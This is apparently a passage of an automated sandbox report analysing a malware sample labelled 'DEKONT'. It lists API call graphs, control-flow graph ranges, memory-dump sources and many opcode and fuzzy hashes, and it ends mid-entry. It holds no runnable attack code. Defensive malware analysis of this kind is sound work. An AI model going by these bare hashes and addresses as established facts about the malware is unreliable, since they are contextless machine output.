38627->38611 38631 6d0d122 38630->38631 38632 6d0d158 3 API calls 38630->38632 38633 6d0d168 3 API calls 38630->38633 38631->38611 38632->38631 38633->38631 38635 6d0e84b 38634->38635 38674 6d0ed80 38635->38674 38679 6d0ed72 38635->38679 38636 6d0e8ce 38637 6d0c100 GetModuleHandleW 38636->38637 38639 6d0e8fa 38636->38639 38638 6d0e93e 38637->38638 38640 6d0f6b0 CreateWindowExW CreateWindowExW CreateWindowExW 38638->38640 38641 6d0f700 CreateWindowExW CreateWindowExW CreateWindowExW 38638->38641 38640->38639 38641->38639 38645 6d0e820 38644->38645 38650 6d0ed80 GetModuleHandleW 38645->38650 38651 6d0ed72 GetModuleHandleW 38645->38651 38646 6d0e8ce 38649 6d0e8fa 38646->38649 38684 6d0c100 38646->38684 38650->38646 38651->38646 38655 6d0d19c 38654->38655 38656 6d0d179 38654->38656 38655->38627 38657 6d0c100 GetModuleHandleW 38656->38657 38658 6d0d184 38657->38658 38658->38655 38662 6d0d400 GetModuleHandleW LoadLibraryExW 38658->38662 38663 6d0d3f1 GetModuleHandleW LoadLibraryExW 38658->38663 38659 6d0d3a0 GetModuleHandleW 38661 6d0d3cd 38659->38661 38660 6d0d194 38660->38655 38660->38659 38661->38627 38662->38660 38663->38660 38665 6d0d179 38664->38665 38669 6d0d19c 38664->38669 38666 6d0c100 GetModuleHandleW 38665->38666 38667 6d0d184 38666->38667 38667->38669 38672 6d0d400 GetModuleHandleW LoadLibraryExW 38667->38672 38673 6d0d3f1 GetModuleHandleW LoadLibraryExW 38667->38673 38668 6d0d194 38668->38669 38670 6d0d3a0 GetModuleHandleW 38668->38670 38669->38627 38671 6d0d3cd 38670->38671 38671->38627 38672->38668 38673->38668 38675 6d0edad 38674->38675 38676 6d0ee2e 38675->38676 38677 6d0eef0 GetModuleHandleW 38675->38677 38678 6d0eee2 GetModuleHandleW 38675->38678 38677->38676 38678->38676 38680 6d0ed80 38679->38680 38681 6d0ee2e 38680->38681 38682 6d0eef0 GetModuleHandleW 38680->38682 38683 6d0eee2 GetModuleHandleW 38680->38683 38682->38681 38683->38681 38686 6d0d358 GetModuleHandleW 38684->38686 38687 6d0d3cd 38686->38687 38688 6d0f700 38687->38688 38696 6d0f6b0 38687->38696 38689 6d0f71b 38688->38689 38689->38649 38690 6d0f74b CreateWindowExW 38689->38690 38693 6d0f6b0 CreateWindowExW CreateWindowExW 38689->38693 38694 6d0f700 CreateWindowExW CreateWindowExW 38689->38694 38695 6d0d84c CreateWindowExW 38689->38695 38692 6d0f874 38690->38692 38692->38692 38693->38689 38694->38689 38695->38689 38697 6d0f65e 38696->38697 38700 6d0f6a7 38696->38700 38697->38649 38698 6d0f74b CreateWindowExW 38701 6d0f874 38698->38701 38700->38649 38700->38696 38700->38698 38702 6d0f6b0 CreateWindowExW CreateWindowExW 38700->38702 38703 6d0f700 CreateWindowExW CreateWindowExW 38700->38703 38704 6d0d84c CreateWindowExW 38700->38704 38701->38701 38702->38700 38703->38700 38704->38700

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1030 5b289b0-5b289df 1031 5b289e1 1030->1031 1032 5b289e6-5b28a7c 1030->1032 1031->1032 1034 5b28b1b-5b28b21 1032->1034 1035 5b28a81-5b28a94 1034->1035 1036 5b28b27-5b28b3f 1034->1036 1037 5b28a96 1035->1037 1038 5b28a9b-5b28aec 1035->1038 1039 5b28b53-5b28b66 1036->1039 1040 5b28b41-5b28b4e 1036->1040 1037->1038 1056 5b28aee-5b28afc 1038->1056 1057 5b28aff-5b28b11 1038->1057 1042 5b28b68 1039->1042 1043 5b28b6d-5b28b89 1039->1043 1041 5b28ee9-5b28fe6 1040->1041 1048 5b28fe8-5b28fed 1041->1048 1049 5b28fee-5b28ff8 1041->1049 1042->1043 1046 5b28b90-5b28bb4 1043->1046 1047 5b28b8b 1043->1047 1052 5b28bb6 1046->1052 1053 5b28bbb-5b28bed 1046->1053 1047->1046 1048->1049 1052->1053 1062 5b28bf4-5b28c36 1053->1062 1063 5b28bef 1053->1063 1056->1036 1059 5b28b13 1057->1059 1060 5b28b18 1057->1060 1059->1060 1060->1034 1065 5b28c38 1062->1065 1066 5b28c3d-5b28c46 1062->1066 1063->1062 1065->1066 1067 5b28e6e-5b28e74 1066->1067 1068 5b28e7a-5b28e8d 1067->1068 1069 5b28c4b-5b28c70 1067->1069 1072 5b28e94-5b28eaf 1068->1072 1073 5b28e8f 1068->1073 1070 5b28c72 1069->1070 1071 5b28c77-5b28cae 1069->1071 1070->1071 1081 5b28cb0 1071->1081 1082 5b28cb5-5b28ce7 1071->1082 1074 5b28eb1 1072->1074 1075 5b28eb6-5b28eca 1072->1075 1073->1072 1074->1075 1078 5b28ed1-5b28ee7 LdrInitializeThunk 1075->1078 1079 5b28ecc 1075->1079 1078->1041 1079->1078 1081->1082 1084 5b28d4b-5b28d5e 1082->1084 1085 5b28ce9-5b28d0e 1082->1085 1086 5b28d60 1084->1086 1087 5b28d65-5b28d8a 1084->1087 1088 5b28d10 1085->1088 1089 5b28d15-5b28d43 1085->1089 1086->1087 1092 5b28d99-5b28dd1 1087->1092 1093 5b28d8c-5b28d8d 1087->1093 1088->1089 1089->1084 1094 5b28dd3 1092->1094 1095 5b28dd8-5b28e39 call 5b28790 1092->1095 1093->1068 1094->1095 1101 5b28e40-5b28e64 1095->1101 1102 5b28e3b 1095->1102 1105 5b28e66 1101->1105 1106 5b28e6b 1101->1106 1102->1101 1105->1106 1106->1067
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3825646679.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_5b20000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d67916d8ecc99d8cc589bf02b2d350a4d6447cf98e8d314096acf4e51aacc006
                                                              • Instruction ID: c9392fadfe7760ba0385755db7b350b456225eeb9a2e517a5be5f21f2be44e42
                                                              • Opcode Fuzzy Hash: d67916d8ecc99d8cc589bf02b2d350a4d6447cf98e8d314096acf4e51aacc006
                                                              • Instruction Fuzzy Hash: EEF1C674D01228DFDB14DFA9C884B9DBBB2FF48304F5481A9E408AB355DB75A986CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1285 5b2be28-5b2be4e 1286 5b2be50 1285->1286 1287 5b2be55-5b2be7f LdrInitializeThunk 1285->1287 1286->1287 1289 5b2be86-5b2bea6 1287->1289 1290 5b2beba-5b2bed0 1289->1290 1291 5b2bea8-5b2beb5 1289->1291 1293 5b2bed2 1290->1293 1294 5b2bed7-5b2bef1 1290->1294 1292 5b2bf3d-5b2c019 1291->1292 1298 5b2c021-5b2c02b 1292->1298 1299 5b2c01b-5b2c020 1292->1299 1293->1294 1296 5b2bf02-5b2bf18 1294->1296 1297 5b2bef3-5b2bf00 1294->1297 1300 5b2bf1a 1296->1300 1301 5b2bf1f-5b2bf2c 1296->1301 1297->1292 1299->1298 1300->1301 1302 5b2bf33-5b2bf3b 1301->1302 1303 5b2bf2e 1301->1303 1302->1292 1303->1302
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3825646679.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_5b20000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 01e259d5e6c4d96460441aecb28e2910c36468ea119e29dedab6ec178fe4c100
                                                              • Instruction ID: b57be7aa9fec34e998459b55afcb6248972b58c04e2eba3e35a9d6b7b112eb83
                                                              • Opcode Fuzzy Hash: 01e259d5e6c4d96460441aecb28e2910c36468ea119e29dedab6ec178fe4c100
                                                              • Instruction Fuzzy Hash: 7E414AB0D042189BDB14CF99C584ADDFBB6FF88304F248169E4086B395CB31A986CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d5a0f3a7d9ab67cf19ca49adf01f3f93bbc169cff39d522e446de3bd0ade65cb
                                                              • Instruction ID: 6cf4bc6a172e4a6c912e6e7df010d0a8d23517e2b5e6e82b5d217ced7df63062
                                                              • Opcode Fuzzy Hash: d5a0f3a7d9ab67cf19ca49adf01f3f93bbc169cff39d522e446de3bd0ade65cb
                                                              • Instruction Fuzzy Hash: 0A72AE70A0021ADFCB15CFA8C994AAEBBF2FF88310F258559E8459B3A5D731ED51CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ef763b2313d77ff957b9df66849db1e9114bb6400b0b44f6352d2f2aa867483b
                                                              • Instruction ID: 273a7e1c62694f0293dd0b45d773b4bd86b78884c19c2c8198fa236d49051dfa
                                                              • Opcode Fuzzy Hash: ef763b2313d77ff957b9df66849db1e9114bb6400b0b44f6352d2f2aa867483b
                                                              • Instruction Fuzzy Hash: BD827F74E01229CFDB65DF69C898BDDBBB2BB89300F1481EA940DA7261DB345E81CF41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c8f70d3b07a72f7957853cb653bcd1e5f8ff04fe3e231d20fe23a09b451ccc56
                                                              • Instruction ID: ee168c98b2a0807edaa2fb3e8fad002c6b45aa697f7558fccb9a6839c70d1539
                                                              • Opcode Fuzzy Hash: c8f70d3b07a72f7957853cb653bcd1e5f8ff04fe3e231d20fe23a09b451ccc56
                                                              • Instruction Fuzzy Hash: 7F126B70A0021A9FDB15DF69D894BAEBBB6BFC8300F24856DE5469B394DB34DC41CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d8f508244a8f1a5de8372520a84735a42f5417c37e21f7d211a84894c8a92f0d
                                                              • Instruction ID: 131abd327a48c5c8c3025595a4ff03f1ef232e8399ee9def36a74bccd8022969
                                                              • Opcode Fuzzy Hash: d8f508244a8f1a5de8372520a84735a42f5417c37e21f7d211a84894c8a92f0d
                                                              • Instruction Fuzzy Hash: 3CE1EA75A04259CFDB14DFA9C985A9DBBB1FF58318F25806AE809AB361D730EC41CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9156bc0fd106c982773c0b534a05c9840d6221825d4d8c39c3c0bd7f08f91487
                                                              • Instruction ID: 359ff61e272b5f330b251a98744df09ddd57cb3b4eef66d0b6a75e8f1af4974c
                                                              • Opcode Fuzzy Hash: 9156bc0fd106c982773c0b534a05c9840d6221825d4d8c39c3c0bd7f08f91487
                                                              • Instruction Fuzzy Hash: 02D1EA71A0011ADFDB15CFA9CA84AADBBFAFF88344F258069E415AB365D730DD41CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5155c0e9ea90b7ae8bcbfdf3e24aed9bb50fc6eb1ff424a0fcec34ea6bf9df4b
                                                              • Instruction ID: 8b5469d0c8c476f7b9b990fd818b18c94e2889a2c29f0a367ec4e6175dca5127
                                                              • Opcode Fuzzy Hash: 5155c0e9ea90b7ae8bcbfdf3e24aed9bb50fc6eb1ff424a0fcec34ea6bf9df4b
                                                              • Instruction Fuzzy Hash: 73E1AE74E01218CFEB64DFA5C894B9DBBB2BF88304F2081AAD409A7395DB355E85CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3ee3f15c6d02a478af2ece9fd61f8b647d0e8c9a5b3962911bff8a5c3220e9b9
                                                              • Instruction ID: c70450953edf84e5d2732dc8b469697b7d849bf8b786ad39ddecdf96de9508db
                                                              • Opcode Fuzzy Hash: 3ee3f15c6d02a478af2ece9fd61f8b647d0e8c9a5b3962911bff8a5c3220e9b9
                                                              • Instruction Fuzzy Hash: 4CC19E74E00218CFDB54DFA5C994B9DBBB2FB88305F2080AAD809AB355DB356E85DF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b4637ca14caa268361c6a8b8fea6f7497c6ed5bb63e0c0afbf2655276fe12a90
                                                              • Instruction ID: 3b58c8e57c7f75a477527f20e54c00323b210f122b59c54ee4c4f3e5d150660d
                                                              • Opcode Fuzzy Hash: b4637ca14caa268361c6a8b8fea6f7497c6ed5bb63e0c0afbf2655276fe12a90
                                                              • Instruction Fuzzy Hash: 98A1A175E016288FEB68CF6AC944B9DFBF2AF89300F14C0AAD40DA7254DB745A85CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c5a5484b564d1ca0291752c9901817fdb57c2590877e672e73fdb59df6746b3b
                                                              • Instruction ID: fb59f2b866334b2170da27ce7138310f8ed169a30404a90c7d98d8b33f2d69f0
                                                              • Opcode Fuzzy Hash: c5a5484b564d1ca0291752c9901817fdb57c2590877e672e73fdb59df6746b3b
                                                              • Instruction Fuzzy Hash: 7FA19175E016288FEB68CF6AD944B9DBBF2BF89300F14C0AAD40DA7255DB345A85CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8095ae7f92189ebce9c3e9b115337e8c84ab26fcbced9e03f8656202a590875f
                                                              • Instruction ID: 18949e704eec4710b9f34bd4186b9671f8c67da1073f7e86cb347e3a01e545a7
                                                              • Opcode Fuzzy Hash: 8095ae7f92189ebce9c3e9b115337e8c84ab26fcbced9e03f8656202a590875f
                                                              • Instruction Fuzzy Hash: 18A192B5E016188FEB68CF6AC944B9DBBF2BF89300F14D0AAD40DA7255DB345A85CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a2626b454c4920dd349a174839af947634ca325f974a3d3a569c55ef42163d87
                                                              • Instruction ID: 90cc32a7ad57b6e7e03b29039203c74badb42f447fa54ed32b74f391f2404d55
                                                              • Opcode Fuzzy Hash: a2626b454c4920dd349a174839af947634ca325f974a3d3a569c55ef42163d87
                                                              • Instruction Fuzzy Hash: 25A1A075E016288FEB68CF6AC944B9DBBF2BF89300F14C0AAD40DA7254DB345A85CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f3bace165116b8ef86671331d6041358561ec6620631e30aa759a87771a45da6
                                                              • Instruction ID: 2b36981bc6ff423f2246d4e782557054e762098e20fb9bef93e7cdde9859ae14
                                                              • Opcode Fuzzy Hash: f3bace165116b8ef86671331d6041358561ec6620631e30aa759a87771a45da6
                                                              • Instruction Fuzzy Hash: E6A18275E016288FEB68CF6AC944B9DBBF2BF89300F14C0AAD40DA7255DB345A85CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: df7b22861dd050b81d73ad12871a0b0b924f54a2c5a448da37eda9378a50fb5c
                                                              • Instruction ID: 274249b52bae551076c998d5f4391696affb8d57ee6da223e4c9aff7d5bd6ddf
                                                              • Opcode Fuzzy Hash: df7b22861dd050b81d73ad12871a0b0b924f54a2c5a448da37eda9378a50fb5c
                                                              • Instruction Fuzzy Hash: BBA19375E016188FEB64CF6AC944B9DBBF2BF89300F14C0AAD40DA7255DB345A85CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c30db9bafc24e297c9d3e508be61a4757aad06a11d7b4755991611f6318f79b8
                                                              • Instruction ID: 07899595014be56944225a9b6d3988332efc00da294dce7e1119edede97daa4d
                                                              • Opcode Fuzzy Hash: c30db9bafc24e297c9d3e508be61a4757aad06a11d7b4755991611f6318f79b8
                                                              • Instruction Fuzzy Hash: 68A192B5E016188FEB68CF6AC944B9DBBF2AF89300F14C0AAD40DB7255DB345A85CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a2b5051b51c6ba8cf3e72fa783baf2ff51361259d77b55e2f12001a70e99ed45
                                                              • Instruction ID: 66a579ae5eded78fa24601bcaf26345cd0d853129c32bbb2250234cdee64b2bd
                                                              • Opcode Fuzzy Hash: a2b5051b51c6ba8cf3e72fa783baf2ff51361259d77b55e2f12001a70e99ed45
                                                              • Instruction Fuzzy Hash: 92A19175E016288FEB68CF6AC944B9DFBF2AF89300F14C0AAD40DA7255DB345A85CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f1f6b410dbf5877ebd6c29cc7bc5f3b15b88217a68f91207c01ae6587537829c
                                                              • Instruction ID: 1c407527de9e55cd29d96f267592e8a91353c3f46d1571605b18fd4ccd2ab04c
                                                              • Opcode Fuzzy Hash: f1f6b410dbf5877ebd6c29cc7bc5f3b15b88217a68f91207c01ae6587537829c
                                                              • Instruction Fuzzy Hash: 66A19075E016288FEB68CF6AC944B9DBBF2BF89300F14D0AAD40DA7255DB345A85CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ba0436dc65c31860664232dffba1802494c4ef68e265cc9805170f53ad0fd713
                                                              • Instruction ID: 5b9457b4c8f331895767b1f845f6523b2c552e9ae495fa9ee2891cf9375ce599
                                                              • Opcode Fuzzy Hash: ba0436dc65c31860664232dffba1802494c4ef68e265cc9805170f53ad0fd713
                                                              • Instruction Fuzzy Hash: A291D8B4E00209CFDB14DFA9D984A9DBBF2BF89314F24806AE809AB365DB305D41CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4e8612ec6bda32595836631fdd14031827b141c2a305f6bc9db3a733b7741724
                                                              • Instruction ID: cba5067c973f23ec20df6d7c8371e1c5a7abe6be46f0de8ee4247dc0d924bf65
                                                              • Opcode Fuzzy Hash: 4e8612ec6bda32595836631fdd14031827b141c2a305f6bc9db3a733b7741724
                                                              • Instruction Fuzzy Hash: DC8195B4E10219DFDB14DFA9D994B9DBBF2BF88301F24806AE509AB365DB309941CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2681a6db4b7b11601b187627371b43540873da9813f105869070ff891c20ec5a
                                                              • Instruction ID: e9d0bffec81351cc6b5fbb4aa4935d1d942c669aebc9bcc579f38a15463a8812
                                                              • Opcode Fuzzy Hash: 2681a6db4b7b11601b187627371b43540873da9813f105869070ff891c20ec5a
                                                              • Instruction Fuzzy Hash: 4681B7B4E01219DFDB14DFA9D994A9DBBF2BF88300F24806AE909AB365DB305D41CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1085ac0cf2f057eda24fd8068f58e33949c57e22eb33d0bdf12a35ff643251fd
                                                              • Instruction ID: 6fb16c9121f3ad5c514b468ad18ae6494ad0f9fef9b8b012b4e5e82118fe3f37
                                                              • Opcode Fuzzy Hash: 1085ac0cf2f057eda24fd8068f58e33949c57e22eb33d0bdf12a35ff643251fd
                                                              • Instruction Fuzzy Hash: 5A81B6B4E10219CFDB14DFA9D994A9DBBF2BF89300F24806AE449AB365DB309D45CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3826257175.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6ce0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2b631c4dbcf34abea5562e648ba8a9331e2ed12027c88a97723e69a790a9c8e7
                                                              • Instruction ID: 887945e0aa789276a99af1a9788df7c714c2465eef9c18828ef33957083ff773
                                                              • Opcode Fuzzy Hash: 2b631c4dbcf34abea5562e648ba8a9331e2ed12027c88a97723e69a790a9c8e7
                                                              • Instruction Fuzzy Hash: 0E81A174E00218CFDB58DFAAD994B9DBBB2BF89304F20816AD419AB354DB345946CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b740e58cd7ee08659e7441b49efb1e175749a384b0677e4dca52fb2bd24e5c16
                                                              • Instruction ID: aee388ce7d1abc7f4bc4548e86d997369f71bbb0b066a5f73f3a95e57025f585
                                                              • Opcode Fuzzy Hash: b740e58cd7ee08659e7441b49efb1e175749a384b0677e4dca52fb2bd24e5c16
                                                              • Instruction Fuzzy Hash: C581A5B4E00219DFDB14DFA9D984A9DBBF2BF88300F24906AE509AB365DB305D41CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b44701218f6d3e525bbe7b9f4ae6e8a1297da606a3f5b59a4006bd6a356d6227
                                                              • Instruction ID: 245ac4e552ce70003861aba45de947c6021629e9c7b277fff263424976381ee9
                                                              • Opcode Fuzzy Hash: b44701218f6d3e525bbe7b9f4ae6e8a1297da606a3f5b59a4006bd6a356d6227
                                                              • Instruction Fuzzy Hash: 8C8193B4E01219DFDB54DFA9D994A9DBBF2BF88300F248069E809AB365DB349941CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3821098633.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2dc0000_DEKONT.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 65cba7abeeecb598d7b5680c225bd20521356ed202ba4815e057d8bf1a49ab5f
                                                              • Instruction ID: 0e37bb49125c587324b372ffb0d3c5d8d8f7cd171466d1eebeab7ff98fe3131b
                                                              • Opcode Fuzzy Hash: 65cba7abeeecb598d7b5680c225bd20521356ed202ba4815e057d8bf1a49ab5f
